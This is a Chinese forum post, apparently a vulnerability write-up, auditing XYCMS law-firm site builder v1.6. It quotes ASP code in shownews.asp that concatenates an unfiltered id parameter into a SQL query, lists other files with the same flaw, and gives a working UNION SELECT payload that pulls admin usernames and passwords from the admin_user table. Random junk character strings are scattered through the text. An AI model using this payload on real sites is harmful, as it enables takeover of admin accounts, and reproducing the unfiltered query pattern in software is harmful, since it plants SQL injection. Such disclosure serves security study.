前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似! E/ z- a7 c7 @" P
3 I/ z- v+ e8 }% H
淫荡分割线2 P: l4 n( G) q$ S
--------------------------------------------------------9 U3 P* z m9 B1 H- Q
" k) K+ {, B7 e% o, c
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)( F+ `# I1 h& r6 V- C
源码地址:http://down.chinaz.com/soft/29233.htm- d+ U# r1 G' O: V) n7 L+ R) Z
, J* l" Y, m1 O- I漏洞文件:shownews.asp
& ]* f1 s7 O. V( K9 U. u4 w) D漏洞代码:7-13行# k9 N5 `0 N$ h3 L( ]
4 V, s9 O, O& D+ ~, E
7 M. E( H3 f% `% F) C3 \1 ^4 a<% & n, |+ \2 H, @4 T/ S; ]
id=request.QueryString("id")# y1 O5 [. {* ?# } ^) n& j! i
' I* z- e' D! |) ]& a/ w6 e
set snews=server.createobject("adodb.recordset")
4 G" w/ X$ k* ]5 m0 |exec="select * from [news] where id="&id
' [+ s+ a( L6 G6 x0 v5 J ysnews.open exec,conn,1,1
1 E$ A! V% b- y( A, p4 v8 Q%>. n' h8 v% i8 ] a; G
1 \$ d3 f! @8 @
8 l: F7 j! P4 W ~
什么过滤都没有 直造成注入
$ @5 t+ L9 X4 @8 u I ' R# _, t) @% s0 `4 g% k( n/ o5 E
注入点:http://127.0.0.1:99/shownews.asp?id=xx! X3 q; M8 r/ D( P
* T- b- M2 S* e j! ~. J其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找: D* ^$ Q7 K$ n2 V* m/ p2 U
* Y" h5 ?" Q" g) n$ e6 e- G
% s: Z' h$ H4 a; O" v$ \ Iexp: union select 1,admin,password,4,5,7 from admin_user% ], y( O& [0 E# I6 v
9 F0 B, k' r& i# i
|